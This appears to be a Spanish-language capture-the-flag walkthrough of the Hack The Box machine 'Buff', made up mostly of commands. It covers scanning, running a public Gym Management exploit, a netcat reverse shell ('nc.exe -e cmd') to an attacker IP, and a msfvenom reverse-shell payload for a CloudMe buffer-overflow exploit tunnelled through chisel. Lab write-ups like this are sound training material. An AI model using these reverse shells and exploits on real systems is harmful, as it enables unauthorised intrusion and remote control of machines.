nmap -A -p- -oA buff 10.129.191.5 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210817121659.png

nmap -sC -sV -O -p- -oA active 10.129.191.5

nmap -sU -O -p- -oA buff-udp 10.129.191.5

nikto -h 10.129.191.5:8080

whatweb http://10.129.191.5:8080

Pasted image 20210817121805.png

http://10.129.191.5:8080

Pasted image 20210817121956.png

Hacemos un searchsploit Gym Management

Pasted image 20210817122056.png

Bajamos el archivo

searchsploit -m 48506.py

Pasted image 20210817122150.png

Pasted image 20210817122456.png

python2 48506.py http://buff.htb:8080

Pasted image 20210817123510.png

Vemos que es un shell falso y parece que siempre nos da el mismo resultado.

dir C:\Users\shaun\Desktop

Pasted image 20210817124356.png

locate nc.exe

cp /usr/share/SecLists/Web-Shells/FuzzDb/nc.exe .

Para crear una mejor reverse shell.

Pasted image 20210817124542.png

nc.exe -e cmd 10.10.14.110 443

rlwrap nc -lvnp 443

Pasted image 20210817124736.png

Vemos que tipos de privilegios tenemos

whoami /priv

Pasted image 20210817125010.png

whoami /all

Pasted image 20210817125152.png

curl http://10.10.14.110/winPeasx86.exe -o winPEAS.exe

Pasted image 20210817130719.png

https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe/binaries/Obfuscated%20Releases

.\winPEAS.exe

Pasted image 20210817131752.png

netstat -nat

Despues de ejecutar winPeas.exe y ver el resultado. Vemos el puerto 8888 que usa CloudMe

Pasted image 20210817132242.png

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.110 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload

Copiamos el resultado al script que obtenemos abajo y lo cambiamos el payload del script en 48389.py

Pasted image 20210817143936.png

./chisel server --reverse -p 8000

.\chisel.exe client 10.10.14.110:8000 R:8888:localhost:8888

Pasted image 20210817154056.png

nc -lvnp 443

Pasted image 20210817154019.png

Pasted image 20210817154406.png

boxes

copyright©2022 Cu3rv0x all rights reserved